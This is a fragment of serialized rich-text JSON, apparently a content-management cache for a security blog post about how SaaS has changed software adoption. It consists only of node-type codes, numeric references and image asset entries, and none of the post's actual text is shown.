13,"nodeType":178},{},[315814],{"data":315815,"marks":315816,"value":293927,"nodeType":173},{},[],{"data":315818,"content":315819,"nodeType":178},{},[315820],{"data":315821,"marks":315822,"value":293934,"nodeType":173},{},[],{"data":315824,"content":315825,"nodeType":235},{},[315826],{"data":315827,"marks":315828,"value":40632,"nodeType":173},{},[],{"data":315830,"content":315831,"nodeType":178},{},[315832],{"data":315833,"marks":315834,"value":293947,"nodeType":173},{},[],{"data":315836,"content":315837,"nodeType":178},{},[315838],{"data":315839,"marks":315840,"value":293955,"nodeType":173},{},[315841],{"type":370},{"data":315843,"content":315844,"nodeType":250},{},[315845,315854,315863],{"data":315846,"content":315847,"nodeType":254},{},[315848],{"data":315849,"content":315850,"nodeType":178},{},[315851],{"data":315852,"marks":315853,"value":293968,"nodeType":173},{},[],{"data":315855,"content":315856,"nodeType":254},{},[315857],{"data":315858,"content":315859,"nodeType":178},{},[315860],{"data":315861,"marks":315862,"value":293978,"nodeType":173},{},[],{"data":315864,"content":315865,"nodeType":254},{},[315866],{"data":315867,"content":315868,"nodeType":178},{},[315869],{"data":315870,"marks":315871,"value":293988,"nodeType":173},{},[],{"data":315873,"content":315874,"nodeType":178},{},[315875],{"data":315876,"marks":315877,"value":293996,"nodeType":173},{},[315878],{"type":370},{"data":315880,"content":315881,"nodeType":250},{},[315882,315891,315900],{"data":315883,"content":315884,"nodeType":254},{},[315885],{"data":315886,"content":315887,"nodeType":178},{},[315888],{"data":315889,"marks":315890,"value":294009,"nodeType":173},{},[],{"data":315892,"content":315893,"nodeType":254},{},[315894],{"data":315895,"content":315896,"nodeType":178},{},[315897],{"data":315898,"marks":315899,"value":294019,"nodeType":173},{},[],{"data":315901,"content":315902,"nodeType":254},{},[315903],{"data":315904,"content":315905,"nodeType":178},{},[315906],{"data":315907,"marks":315908,"value":294029,"nodeType":173},{},[],{"data":315910,"content":315911,"nodeType":178},{},[315912,315915,315921],{"data":315913,"marks":315914,"value":294036,"nodeType":173},{},[],{"data":315916,"content":315917,"nodeType":186},{"uri":294039},[315918],{"data":315919,"marks":315920,"value":294044,"nodeType":173},{},[],{"data":315922,"marks":315923,"value":294048,"nodeType":173},{},[],{"items":315925},[315926,315928],{"sys":315927,"name":274157},{"id":274156},{"sys":315929,"name":26133},{"id":26132},{"items":315931},[315932],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":315933},{"url":13981},{"items":315935},[315936],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":315937},{"url":13981},{"json":315939,"links":317194},{"nodeType":165,"data":315940,"content":315941},{},[315942,315948,315954,315960,315966,315972,315978,315984,315990,316029,316035,316041,316047,316053,316059,316064,316070,316076,316082,316089,316095,316101,316107,316113,316119,316125,316131,316147,316152,316158,316164,316174,316181,316187,316192,316198,316204,316209,316215,316223,316236,316257,316263,316269,316275,316281,316286,316292,316298,316304,316310,316316,316322,316338,316344,316350,316356,316362,316375,316405,316413,316419,316425,316431,316437,316443,316449,316455,316460,316466,316472,316478,316484,316490,316496,316512,316518,316523,316529,316550,316556,316562,316592,316598,316604,316610,316616,316628,316634,316694,316700,316706,316727,316732,316738,316744,316750,316780,316786,317127,317133,317149,317155,317163,317176,317182,317188],{"nodeType":169,"data":315943,"content":315944},{},[315945],{"nodeType":173,"value":258287,"marks":315946,"data":315947},[],{},{"nodeType":178,"data":315949,"content":315950},{},[315951],{"nodeType":173,"value":280347,"marks":315952,"data":315953},[],{},{"nodeType":178,"data":315955,"content":315956},{},[315957],{"nodeType":173,"value":280354,"marks":315958,"data":315959},[],{},{"nodeType":178,"data":315961,"content":315962},{},[315963],{"nodeType":173,"value":280361,"marks":315964,"data":315965},[],{},{"nodeType":178,"data":315967,"content":315968},{},[315969],{"nodeType":173,"value":280368,"marks":315970,"data":315971},[],{},{"nodeType":178,"data":315973,"content":315974},{},[315975],{"nodeType":173,"value":280375,"marks":315976,"data":315977},[],{},{"nodeType":178,"data":315979,"content":315980},{},[315981],{"nodeType":173,"value":280382,"marks":315982,"data":315983},[],{},{"nodeType":178,"data":315985,"content":315986},{},[315987],{"nodeType":173,"value":280389,"marks":315988,"data":315989},[],{},{"nodeType":250,"data":315991,"content":315992},{},[315993,316002,316011,316020],{"nodeType":254,"data":315994,"content":315995},{},[315996],{"nodeType":178,"data":315997,"content":315998},{},[315999],{"nodeType":173,"value":280402,"marks":316000,"data":316001},[],{},{"nodeType":254,"data":316003,"content":316004},{},[316005],{"nodeType":178,"data":316006,"content":316007},{},[316008],{"nodeType":173,"value":280412,"marks":316009,"data":316010},[],{},{"nodeType":254,"data":316012,"content":316013},{},[316014],{"nodeType":178,"data":316015,"content":316016},{},[316017],{"nodeType":173,"value":280422,"marks":316018,"data":316019},[],{},{"nodeType":254,"data":316021,"content":316022},{},[316023],{"nodeType":178,"data":316024,"content":316025},{},[316026],{"nodeType":173,"value":280432,"marks":316027,"data":316028},[],{},{"nodeType":178,"data":316030,"content":316031},{},[316032],{"nodeType":173,"value":280439,"marks":316033,"data":316034},[],{},{"nodeType":178,"data":316036,"content":316037},{},[316038],{"nodeType":173,"value":280446,"marks":316039,"data":316040},[],{},{"nodeType":169,"data":316042,"content":316043},{},[316044],{"nodeType":173,"value":280453,"marks":316045,"data":316046},[],{},{"nodeType":235,"data":316048,"content":316049},{},[316050],{"nodeType":173,"value":280460,"marks":316051,"data":316052},[],{},{"nodeType":178,"data":316054,"content":316055},{},[316056],{"nodeType":173,"value":280467,"marks":316057,"data":316058},[],{},{"nodeType":312,"data":316060,"content":316063},{"target":316061},{"sys":316062},{"id":280474,"type":317,"linkType":318},[],{"nodeType":178,"data":316065,"content":316066},{},[316067],{"nodeType":173,"value":280480,"marks":316068,"data":316069},[],{},{"nodeType":178,"data":316071,"content":316072},{},[316073],{"nodeType":173,"value":280487,"marks":316074,"data":316075},[],{},{"nodeType":178,"data":316077,"content":316078},{},[316079],{"nodeType":173,"value":280494,"marks":316080,"data":316081},[],{},{"nodeType":178,"data":316083,"content":316084},{},[316085],{"nodeType":173,"value":280501,"marks":316086,"data":316088},[316087],{"type":1646},{},{"nodeType":235,"data":316090,"content":316091},{},[316092],{"nodeType":173,"value":280509,"marks":316093,"data":316094},[],{},{"nodeType":178,"data":316096,"content":316097},{},[316098],{"nodeType":173,"value":280516,"marks":316099,"data":316100},[],{},{"nodeType":178,"data":316102,"content":316103},{},[316104],{"nodeType":173,"value":280523,"marks":316105,"data":316106},[],{},{"nodeType":178,"data":316108,"content":316109},{},[316110],{"nodeType":173,"value":280530,"marks":316111,"data":316112},[],{},{"nodeType":178,"data":316114,"content":316115},{},[316116],{"nodeType":173,"value":280537,"marks":316117,"data":316118},[],{},{"nodeType":235,"data":316120,"content":316121},{},[316122],{"nodeType":173,"value":280544,"marks":316123,"data":316124},[],{},{"nodeType":178,"data":316126,"content":316127},{},[316128],{"nodeType":173,"value":280551,"marks":316129,"data":316130},[],{},{"nodeType":178,"data":316132,"content":316133},{},[316134,316137,316144],{"nodeType":173,"value":280558,"marks":316135,"data":316136},[],{},{"nodeType":186,"data":316138,"content":316139},{"uri":280563},[316140],{"nodeType":173,"value":280566,"marks":316141,"data":316143},[316142],{"type":194},{},{"nodeType":173,"value":280571,"marks":316145,"data":316146},[],{},{"nodeType":312,"data":316148,"content":316151},{"target":316149},{"sys":316150},{"id":280578,"type":317,"linkType":318},[],{"nodeType":178,"data":316153,"content":316154},{},[316155],{"nodeType":173,"value":280584,"marks":316156,"data":316157},[],{},{"nodeType":178,"data":316159,"content":316160},{},[316161],{"nodeType":173,"value":280591,"marks":316162,"data":316163},[],{},{"nodeType":178,"data":316165,"content":316166},{},[316167,316170],{"nodeType":173,"value":280598,"marks":316168,"data":316169},[],{},{"nodeType":173,"value":3107,"marks":316171,"data":316173},[316172],{"type":370},{},{"nodeType":178,"data":316175,"content":316176},{},[316177],{"nodeType":173,"value":280609,"marks":316178,"data":316180},[316179],{"type":370},{},{"nodeType":178,"data":316182,"content":316183},{},[316184],{"nodeType":173,"value":280617,"marks":316185,"data":316186},[],{},{"nodeType":312,"data":316188,"content":316191},{"target":316189},{"sys":316190},{"id":280624,"type":317,"linkType":318},[],{"nodeType":235,"data":316193,"content":316194},{},[316195],{"nodeType":173,"value":280630,"marks":316196,"data":316197},[],{},{"nodeType":178,"data":316199,"content":316200},{},[316201],{"nodeType":173,"value":280637,"marks":316202,"data":316203},[],{},{"nodeType":312,"data":316205,"content":316208},{"target":316206},{"sys":316207},{"id":280644,"type":317,"linkType":318},[],{"nodeType":178,"data":316210,"content":316211},{},[316212],{"nodeType":173,"value":280650,"marks":316213,"data":316214},[],{},{"nodeType":178,"data":316216,"content":316217},{},[316218],{"nodeType":173,"value":280657,"marks":316219,"data":316222},[316220,316221],{"type":1646},{"type":370},{},{"nodeType":178,"data":316224,"content":316225},{},[316226,316229,316233],{"nodeType":173,"value":280666,"marks":316227,"data":316228},[],{},{"nodeType":173,"value":280670,"marks":316230,"data":316232},[316231],{"type":370},{},{"nodeType":173,"value":280675,"marks":316234,"data":316235},[],{},{"nodeType":246189,"data":316237,"content":316238},{},[316239,316248],{"nodeType":254,"data":316240,"content":316241},{},[316242],{"nodeType":178,"data":316243,"content":316244},{},[316245],{"nodeType":173,"value":280688,"marks":316246,"data":316247},[],{},{"nodeType":254,"data":316249,"content":316250},{},[316251],{"nodeType":178,"data":316252,"content":316253},{},[316254],{"nodeType":173,"value":280698,"marks":316255,"data":316256},[],{},{"nodeType":169,"data":316258,"content":316259},{},[316260],{"nodeType":173,"value":280705,"marks":316261,"data":316262},[],{},{"nodeType":235,"data":316264,"content":316265},{},[316266],{"nodeType":173,"value":280712,"marks":316267,"data":316268},[],{},{"nodeType":178,"data":316270,"content":316271},{},[316272],{"nodeType":173,"value":280719,"marks":316273,"data":316274},[],{},{"nodeType":178,"data":316276,"content":316277},{},[316278],{"nodeType":173,"value":280726,"marks":316279,"data":316280},[],{},{"nodeType":312,"data":316282,"content":316285},{"target":316283},{"sys":316284},{"id":280733,"type":317,"linkType":318},[],{"nodeType":235,"data":316287,"content":316288},{},[316289],{"nodeType":173,"value":280739,"marks":316290,"data":316291},[],{},{"nodeType":178,"data":316293,"content":316294},{},[316295],{"nodeType":173,"value":280746,"marks":316296,"data":316297},[],{},{"nodeType":178,"data":316299,"content":316300},{},[316301],{"nodeType":173,"value":280753,"marks":316302,"data":316303},[],{},{"nodeType":178,"data":316305,"content":316306},{},[316307],{"nodeType":173,"value":280760,"marks":316308,"data":316309},[],{},{"nodeType":178,"data":316311,"content":316312},{},[316313],{"nodeType":173,"value":280767,"marks":316314,"data":316315},[],{},{"nodeType":235,"data":316317,"content":316318},{},[316319],{"nodeType":173,"value":280774,"marks":316320,"data":316321},[],{},{"nodeType":178,"data":316323,"content":316324},{},[316325,316328,316335],{"nodeType":173,"value":280781,"marks":316326,"data":316327},[],{},{"nodeType":186,"data":316329,"content":316330},{"uri":280786},[316331],{"nodeType":173,"value":280789,"marks":316332,"data":316334},[316333],{"type":194},{},{"nodeType":173,"value":280794,"marks":316336,"data":316337},[],{},{"nodeType":178,"data":316339,"content":316340},{},[316341],{"nodeType":173,"value":280801,"marks":316342,"data":316343},[],{},{"nodeType":235,"data":316345,"content":316346},{},[316347],{"nodeType":173,"value":280808,"marks":316348,"data":316349},[],{},{"nodeType":178,"data":316351,"content":316352},{},[316353],{"nodeType":173,"value":280815,"marks":316354,"data":316355},[],{},{"nodeType":178,"data":316357,"content":316358},{},[316359],{"nodeType":173,"value":280822,"marks":316360,"data":316361},[],{},{"nodeType":178,"data":316363,"content":316364},{},[316365,316368,316372],{"nodeType":173,"value":280829,"marks":316366,"data":316367},[],{},{"nodeType":173,"value":280833,"marks":316369,"data":316371},[316370],{"type":1646},{},{"nodeType":173,"value":280838,"marks":316373,"data":316374},[],{},{"nodeType":250,"data":316376,"content":316377},{},[316378,316387,316396],{"nodeType":254,"data":316379,"content":316380},{},[316381],{"nodeType":178,"data":316382,"content":316383},{},[316384],{"nodeType":173,"value":280851,"marks":316385,"data":316386},[],{},{"nodeType":254,"data":316388,"content":316389},{},[316390],{"nodeType":178,"data":316391,"content":316392},{},[316393],{"nodeType":173,"value":280861,"marks":316394,"data":316395},[],{},{"nodeType":254,"data":316397,"content":316398},{},[316399],{"nodeType":178,"data":316400,"content":316401},{},[316402],{"nodeType":173,"value":280871,"marks":316403,"data":316404},[],{},{"nodeType":178,"data":316406,"content":316407},{},[316408],{"nodeType":173,"value":280878,"marks":316409,"data":316412},[316410,316411],{"type":1646},{"type":370},{},{"nodeType":178,"data":316414,"content":316415},{},[316416],{"nodeType":173,"value":280887,"marks":316417,"data":316418},[],{},{"nodeType":235,"data":316420,"content":316421},{},[316422],{"nodeType":173,"value":280894,"marks":316423,"data":316424},[],{},{"nodeType":178,"data":316426,"content":316427},{},[316428],{"nodeType":173,"value":280901,"marks":316429,"data":316430},[],{},{"nodeType":178,"data":316432,"content":316433},{},[316434],{"nodeType":173,"value":280908,"marks":316435,"data":316436},[],{},{"nodeType":235,"data":316438,"content":316439},{},[316440],{"nodeType":173,"value":280915,"marks":316441,"data":316442},[],{},{"nodeType":178,"data":316444,"content":316445},{},[316446],{"nodeType":173,"value":280922,"marks":316447,"data":316448},[],{},{"nodeType":178,"data":316450,"content":316451},{},[316452],{"nodeType":173,"value":280929,"marks":316453,"data":316454},[],{},{"nodeType":312,"data":316456,"content":316459},{"target":316457},{"sys":316458},{"id":280936,"type":317,"linkType":318},[],{"nodeType":178,"data":316461,"content":316462},{},[316463],{"nodeType":173,"value":280942,"marks":316464,"data":316465},[],{},{"nodeType":178,"data":316467,"content":316468},{},[316469],{"nodeType":173,"value":280949,"marks":316470,"data":316471},[],{},{"nodeType":178,"data":316473,"content":316474},{},[316475],{"nodeType":173,"value":280956,"marks":316476,"data":316477},[],{},{"nodeType":169,"data":316479,"content":316480},{},[316481],{"nodeType":173,"value":280963,"marks":316482,"data":316483},[],{},{"nodeType":178,"data":316485,"content":316486},{},[316487],{"nodeType":173,"value":280970,"marks":316488,"data":316489},[],{},{"nodeType":235,"data":316491,"content":316492},{},[316493],{"nodeType":173,"value":280977,"marks":316494,"data":316495},[],{},{"nodeType":178,"data":316497,"content":316498},{},[316499,316502,316509],{"nodeType":173,"value":280984,"marks":316500,"data":316501},[],{},{"nodeType":186,"data":316503,"content":316504},{"uri":280989},[316505],{"nodeType":173,"value":280992,"marks":316506,"data":316508},[316507],{"type":194},{},{"nodeType":173,"value":280997,"marks":316510,"data":316511},[],{},{"nodeType":178,"data":316513,"content":316514},{},[316515],{"nodeType":173,"value":281004,"marks":316516,"data":316517},[],{},{"nodeType":312,"data":316519,"content":316522},{"target":316520},{"sys":316521},{"id":281011,"type":317,"linkType":318},[],{"nodeType":178,"data":316524,"content":316525},{},[316526],{"nodeType":173,"value":281017,"marks":316527,"data":316528},[],{},{"nodeType":246189,"data":316530,"content":316531},{},[316532,316541],{"nodeType":254,"data":316533,"content":316534},{},[316535],{"nodeType":178,"data":316536,"content":316537},{},[316538],{"nodeType":173,"value":281030,"marks":316539,"data":316540},[],{},{"nodeType":254,"data":316542,"content":316543},{},[316544],{"nodeType":178,"data":316545,"content":316546},{},[316547],{"nodeType":173,"value":281040,"marks":316548,"data":316549},[],{},{"nodeType":178,"data":316551,"content":316552},{},[316553],{"nodeType":173,"value":281047,"marks":316554,"data":316555},[],{},{"nodeType":178,"data":316557,"content":316558},{},[316559],{"nodeType":173,"value":281054,"marks":316560,"data":316561},[],{},{"nodeType":250,"data":316563,"content":316564},{},[316565,316574,316583],{"nodeType":254,"data":316566,"content":316567},{},[316568],{"nodeType":178,"data":316569,"content":316570},{},[316571],{"nodeType":173,"value":281067,"marks":316572,"data":316573},[],{},{"nodeType":254,"data":316575,"content":316576},{},[316577],{"nodeType":178,"data":316578,"content":316579},{},[316580],{"nodeType":173,"value":281077,"marks":316581,"data":316582},[],{},{"nodeType":254,"data":316584,"content":316585},{},[316586],{"nodeType":178,"data":316587,"content":316588},{},[316589],{"nodeType":173,"value":281087,"marks":316590,"data":316591},[],{},{"nodeType":178,"data":316593,"content":316594},{},[316595],{"nodeType":173,"value":281094,"marks":316596,"data":316597},[],{},{"nodeType":178,"data":316599,"content":316600},{},[316601],{"nodeType":173,"value":281101,"marks":316602,"data":316603},[],{},{"nodeType":178,"data":316605,"content":316606},{},[316607],{"nodeType":173,"value":281108,"marks":316608,"data":316609},[],{},{"nodeType":178,"data":316611,"content":316612},{},[316613],{"nodeType":173,"value":281115,"marks":316614,"data":316615},[],{},{"nodeType":250,"data":316617,"content":316618},{},[316619],{"nodeType":254,"data":316620,"content":316621},{},[316622],{"nodeType":178,"data":316623,"content":316624},{},[316625],{"nodeType":173,"value":281128,"marks":316626,"data":316627},[],{},{"nodeType":178,"data":316629,"content":316630},{},[316631],{"nodeType":173,"value":281135,"marks":316632,"data":316633},[],{},{"nodeType":250,"data":316635,"content":316636},{},[316637,316676,316685],{"nodeType":254,"data":316638,"content":316639},{},[316640],{"nodeType":178,"data":316641,"content":316642},{},[316643,316646,316653,316656,316663,316666,316673],{"nodeType":173,"value":281148,"marks":316644,"data":316645},[],{},{"nodeType":186,"data":316647,"content":316648},{"uri":281153},[316649],{"nodeType":173,"value":281156,"marks":316650,"data":316652},[316651],{"type":194},{},{"nodeType":173,"value":2936,"marks":316654,"data":316655},[],{},{"nodeType":186,"data":316657,"content":316658},{"uri":281165},[316659],{"nodeType":173,"value":211167,"marks":316660,"data":316662},[316661],{"type":194},{},{"nodeType":173,"value":2936,"marks":316664,"data":316665},[],{},{"nodeType":186,"data":316667,"content":316668},{"uri":281176},[316669],{"nodeType":173,"value":281179,"marks":316670,"data":316672},[316671],{"type":194},{},{"nodeType":173,"value":281184,"marks":316674,"data":316675},[],{},{"nodeType":254,"data":316677,"content":316678},{},[316679],{"nodeType":178,"data":316680,"content":316681},{},[316682],{"nodeType":173,"value":281194,"marks":316683,"data":316684},[],{},{"nodeType":254,"data":316686,"content":316687},{},[316688],{"nodeType":178,"data":316689,"content":316690},{},[316691],{"nodeType":173,"value":281204,"marks":316692,"data":316693},[],{},{"nodeType":235,"data":316695,"content":316696},{},[316697],{"nodeType":173,"value":281211,"marks":316698,"data":316699},[],{},{"nodeType":178,"data":316701,"content":316702},{},[316703],{"nodeType":173,"value":281218,"marks":316704,"data":316705},[],{},{"nodeType":246189,"data":316707,"content":316708},{},[316709,316718],{"nodeType":254,"data":316710,"content":316711},{},[316712],{"nodeType":178,"data":316713,"content":316714},{},[316715],{"nodeType":173,"value":281231,"marks":316716,"data":316717},[],{},{"nodeType":254,"data":316719,"content":316720},{},[316721],{"nodeType":178,"data":316722,"content":316723},{},[316724],{"nodeType":173,"value":281241,"marks":316725,"data":316726},[],{},{"nodeType":312,"data":316728,"content":316731},{"target":316729},{"sys":316730},{"id":281248,"type":317,"linkType":318},[],{"nodeType":178,"data":316733,"content":316734},{},[316735],{"nodeType":173,"value":281254,"marks":316736,"data":316737},[],{},{"nodeType":169,"data":316739,"content":316740},{},[316741],{"nodeType":173,"value":281261,"marks":316742,"data":316743},[],{},{"nodeType":178,"data":316745,"content":316746},{},[316747],{"nodeType":173,"value":281268,"marks":316748,"data":316749},[],{},{"nodeType":250,"data":316751,"content":316752},{},[316753,316762,316771],{"nodeType":254,"data":316754,"content":316755},{},[316756],{"nodeType":178,"data":316757,"content":316758},{},[316759],{"nodeType":173,"value":281281,"marks":316760,"data":316761},[],{},{"nodeType":254,"data":316763,"content":316764},{},[316765],{"nodeType":178,"data":316766,"content":316767},{},[316768],{"nodeType":173,"value":281291,"marks":316769,"data":316770},[],{},{"nodeType":254,"data":316772,"content":316773},{},[316774],{"nodeType":178,"data":316775,"content":316776},{},[316777],{"nodeType":173,"value":281301,"marks":316778,"data":316779},[],{},{"nodeType":178,"data":316781,"content":316782},{},[316783],{"nodeType":173,"value":281308,"marks":316784,"data":316785},[],{},{"nodeType":1653,"data":316787,"content":316788},{},[316789,316812,316880,316929,316967,317074],{"nodeType":1657,"data":316790,"content":316791},{},[316792,316802],{"nodeType":1687,"data":316793,"content":316794},{},[316795],{"nodeType":178,"data":316796,"content":316797},{},[316798],{"nodeType":173,"value":281324,"marks":316799,"data":316801},[316800],{"type":370},{},{"nodeType":1687,"data":316803,"content":316804},{},[316805],{"nodeType":178,"data":316806,"content":316807},{},[316808],{"nodeType":173,"value":281335,"marks":316809,"data":316811},[316810],{"type":370},{},{"nodeType":1657,"data":316813,"content":316814},{},[316815,316824],{"nodeType":1687,"data":316816,"content":316817},{},[316818],{"nodeType":178,"data":316819,"content":316820},{},[316821],{"nodeType":173,"value":281349,"marks":316822,"data":316823},[],{},{"nodeType":1687,"data":316825,"content":316826},{},[316827,316850],{"nodeType":178,"data":316828,"content":316829},{},[316830,316833,316840,316843,316847],{"nodeType":173,"value":37,"marks":316831,"data":316832},[],{},{"nodeType":186,"data":316834,"content":316835},{"uri":281363},[316836],{"nodeType":173,"value":281366,"marks":316837,"data":316839},[316838],{"type":194},{},{"nodeType":173,"value":281371,"marks":316841,"data":316842},[],{},{"nodeType":173,"value":281375,"marks":316844,"data":316846},[316845],{"type":370},{},{"nodeType":173,"value":281380,"marks":316848,"data":316849},[],{},{"nodeType":178,"data":316851,"content":316852},{},[316853,316856,316863,316866,316870,316873,316877],{"nodeType":173,"value":281387,"marks":316854,"data":316855},[],{},{"nodeType":186,"data":316857,"content":316858},{"uri":281392},[316859],{"nodeType":173,"value":281395,"marks":316860,"data":316862},[316861],{"type":194},{},{"nodeType":173,"value":281400,"marks":316864,"data":316865},[],{},{"nodeType":173,"value":281404,"marks":316867,"data":316869},[316868],{"type":370},{},{"nodeType":173,"value":281409,"marks":316871,"data":316872},[],{},{"nodeType":173,"value":281179,"marks":316874,"data":316876},[316875],{"type":370},{},{"nodeType":173,"value":281417,"marks":316878,"data":316879},[],{},{"nodeType":1657,"data":316881,"content":316882},{},[316883,316892],{"nodeType":1687,"data":316884,"content":316885},{},[316886],{"nodeType":178,"data":316887,"content":316888},{},[316889],{"nodeType":173,"value":281430,"marks":316890,"data":316891},[],{},{"nodeType":1687,"data":316893,"content":316894},{},[316895],{"nodeType":178,"data":316896,"content":316897},{},[316898,316902,316905,316912,316915,316919,316922,316926],{"nodeType":173,"value":211167,"marks":316899,"data":316901},[316900],{"type":370},{},{"nodeType":173,"value":281444,"marks":316903,"data":316904},[],{},{"nodeType":186,"data":316906,"content":316907},{"uri":281449},[316908],{"nodeType":173,"value":281452,"marks":316909,"data":316911},[316910],{"type":194},{},{"nodeType":173,"value":281457,"marks":316913,"data":316914},[],{},{"nodeType":173,"value":281461,"marks":316916,"data":316918},[316917],{"type":370},{},{"nodeType":173,"value":281466,"marks":316920,"data":316921},[],{},{"nodeType":173,"value":281404,"marks":316923,"data":316925},[316924],{"type":370},{},{"nodeType":173,"value":281474,"marks":316927,"data":316928},[],{},{"nodeType":1657,"data":316930,"content":316931},{},[316932,316941],{"nodeType":1687,"data":316933,"content":316934},{},[316935],{"nodeType":178,"data":316936,"content":316937},{},[316938],{"nodeType":173,"value":281487,"marks":316939,"data":316940},[],{},{"nodeType":1687,"data":316942,"content":316943},{},[316944],{"nodeType":178,"data":316945,"content":316946},{},[316947,316950,316954,316957,316964],{"nodeType":173,"value":281497,"marks":316948,"data":316949},[],{},{"nodeType":173,"value":211167,"marks":316951,"data":316953},[316952],{"type":370},{},{"nodeType":173,"value":281505,"marks":316955,"data":316956},[],{},{"nodeType":186,"data":316958,"content":316959},{"uri":281510},[316960],{"nodeType":173,"value":281513,"marks":316961,"data":316963},[316962],{"type":194},{},{"nodeType":173,"value":37,"marks":316965,"data":316966},[],{},{"nodeType":1657,"data":316968,"content":316969},{},[316970,316979],{"nodeType":1687,"data":316971,"content":316972},{},[316973],{"nodeType":178,"data":316974,"content":316975},{},[316976],{"nodeType":173,"value":281530,"marks":316977,"data":316978},[],{},{"nodeType":1687,"data":316980,"content":316981},{},[316982,317016,317039,317052,317068],{"nodeType":178,"data":316983,"content":316984},{},[316985,316989,316992,316996,316999,317006,317009,317013],{"nodeType":173,"value":281179,"marks":316986,"data":316988},[316987],{"type":370},{},{"nodeType":173,"value":281544,"marks":316990,"data":316991},[],{},{"nodeType":173,"value":211167,"marks":316993,"data":316995},[316994],{"type":370},{},{"nodeType":173,"value":281552,"marks":316997,"data":316998},[],{},{"nodeType":186,"data":317000,"content":317001},{"uri":281557},[317002],{"nodeType":173,"value":281560,"marks":317003,"data":317005},[317004],{"type":194},{},{"nodeType":173,"value":281565,"marks":317007,"data":317008},[],{},{"nodeType":173,"value":281569,"marks":317010,"data":317012},[317011],{"type":370},{},{"nodeType":173,"value":281574,"marks":317014,"data":317015},[],{},{"nodeType":178,"data":317017,"content":317018},{},[317019,317022,317026,317029,317036],{"nodeType":173,"value":281581,"marks":317020,"data":317021},[],{},{"nodeType":173,"value":281179,"marks":317023,"data":317025},[317024],{"type":370},{},{"nodeType":173,"value":3107,"marks":317027,"data":317028},[],{},{"nodeType":186,"data":317030,"content":317031},{"uri":281593},[317032],{"nodeType":173,"value":281596,"marks":317033,"data":317035},[317034],{"type":194},{},{"nodeType":173,"value":281601,"marks":317037,"data":317038},[],{},{"nodeType":178,"data":317040,"content":317041},{},[317042,317045,317049],{"nodeType":173,"value":281608,"marks":317043,"data":317044},[],{},{"nodeType":173,"value":3107,"marks":317046,"data":317048},[317047],{"type":370},{},{"nodeType":173,"value":281616,"marks":317050,"data":317051},[],{},{"nodeType":178,"data":317053,"content":317054},{},[317055,317058,317065],{"nodeType":173,"value":281623,"marks":317056,"data":317057},[],{},{"nodeType":186,"data":317059,"content":317060},{"uri":281628},[317061],{"nodeType":173,"value":281631,"marks":317062,"data":317064},[317063],{"type":194},{},{"nodeType":173,"value":197,"marks":317066,"data":317067},[],{},{"nodeType":178,"data":317069,"content":317070},{},[317071],{"nodeType":173,"value":281642,"marks":317072,"data":317073},[],{},{"nodeType":1657,"data":317075,"content":317076},{},[317077,317086],{"nodeType":1687,"data":317078,"content":317079},{},[317080],{"nodeType":178,"data":317081,"content":317082},{},[317083],{"nodeType":173,"value":281655,"marks":317084,"data":317085},[],{},{"nodeType":1687,"data":317087,"content":317088},{},[317089],{"nodeType":178,"data":317090,"content":317091},{},[317092,317095,317102,317105,317109,317112,317124],{"nodeType":173,"value":281665,"marks":317093,"data":317094},[],{},{"nodeType":186,"data":317096,"content":317097},{"uri":281670},[317098],{"nodeType":173,"value":281673,"marks":317099,"data":317101},[317100],{"type":194},{},{"nodeType":173,"value":281678,"marks":317103,"data":317104},[],{},{"nodeType":173,"value":211167,"marks":317106,"data":317108},[317107],{"type":370},{},{"nodeType":173,"value":933,"marks":317110,"data":317111},[],{},{"nodeType":186,"data":317113,"content":317114},{"uri":281690},[317115,317120],{"nodeType":173,"value":281693,"marks":317116,"data":317119},[317117,317118],{"type":194},{"type":370},{},{"nodeType":173,"value":281699,"marks":317121,"data":317123},[317122],{"type":194},{},{"nodeType":173,"value":281704,"marks":317125,"data":317126},[],{},{"nodeType":178,"data":317128,"content":317129},{},[317130],{"nodeType":173,"value":281711,"marks":317131,"data":317132},[],{},{"nodeType":178,"data":317134,"content":317135},{},[317136,317139,317146],{"nodeType":173,"value":281718,"marks":317137,"data":317138},[],{},{"nodeType":186,"data":317140,"content":317141},{"uri":281723},[317142],{"nodeType":173,"value":281156,"marks":317143,"data":317145},[317144],{"type":194},{},{"nodeType":173,"value":281730,"marks":317147,"data":317148},[],{},{"nodeType":178,"data":317150,"content":317151},{},[317152],{"nodeType":173,"value":281737,"marks":317153,"data":317154},[],{},{"nodeType":178,"data":317156,"content":317157},{},[317158],{"nodeType":173,"value":281744,"marks":317159,"data":317162},[317160,317161],{"type":370},{"type":1646},{},{"nodeType":178,"data":317164,"content":317165},{},[317166,317169,317173],{"nodeType":173,"value":281753,"marks":317167,"data":317168},[],{},{"nodeType":173,"value":281757,"marks":317170,"data":317172},[317171],{"type":1646},{},{"nodeType":173,"value":281762,"marks":317174,"data":317175},[],{},{"nodeType":169,"data":317177,"content":317178},{},[317179],{"nodeType":173,"value":281769,"marks":317180,"data":317181},[],{},{"nodeType":178,"data":317183,"content":317184},{},[317185],{"nodeType":173,"value":281776,"marks":317186,"data":317187},[],{},{"nodeType":178,"data":317189,"content":317190},{},[317191],{"nodeType":173,"value":281783,"marks":317192,"data":317193},[],{},{"entries":317195},{"hyperlink":317196,"inline":317197,"block":317198},[],[],[317199,317202,317205,317208,317211,317214,317217,317220],{"sys":317200,"__typename":5345,"title":315586,"caption":315587,"layoutMode":118,"file":317201},{"id":280474},{"url":315589,"width":310485,"height":315590},{"sys":317203,"__typename":5345,"title":310489,"caption":310490,"layoutMode":112585,"file":317204},{"id":280578},{"url":310492,"width":5358,"height":23894},{"sys":317206,"__typename":5345,"title":310481,"caption":310482,"layoutMode":118,"file":317207},{"id":280624},{"url":310484,"width":310485,"height":310486},{"sys":317209,"__typename":5345,"title":310495,"caption":310496,"layoutMode":112585,"file":317210},{"id":280644},{"url":310498,"width":310499,"height":173206},{"sys":317212,"__typename":5345,"title":298879,"caption":298879,"layoutMode":112585,"file":317213},{"id":280733},{"url":298881,"width":298882,"height":298883},{"sys":317215,"__typename":5345,"title":315599,"caption":315600,"layoutMode":112585,"file":317216},{"id":280936},{"url":315602,"width":286466,"height":315603},{"sys":317218,"__typename":5345,"title":298886,"caption":298887,"layoutMode":112585,"file":317219},{"id":281011},{"url":298889,"width":298890,"height":296715},{"sys":317221,"__typename":5345,"title":300794,"caption":300794,"layoutMode":112585,"file":317222},{"id":281248},{"url":300796,"width":5358,"height":300797},"content:blog:saas-has-changed-how-we-adopt-software-how-should-security-adapt.json","blog/saas-has-changed-how-we-adopt-s